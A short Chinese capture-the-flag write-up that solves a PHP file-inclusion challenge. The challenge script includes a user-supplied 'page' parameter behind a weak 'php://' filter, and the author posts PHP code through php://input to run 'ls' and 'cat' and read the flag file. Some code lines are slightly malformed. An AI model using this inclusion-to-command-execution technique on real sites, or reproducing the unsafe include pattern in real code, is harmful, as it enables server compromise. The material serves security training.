<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) { 以是否检测到php://为判断执行循环
$page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>
综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参
准备好一个Firefox 一个max hackbar

通过php伪协议php://input
首先post传入第一个命令 ,这个命令用来展开目录

<php
system("ls")
?>
随后得到fl4gisisish3r3.php 一般这种文件就是flag,
我们使用
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>
有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是
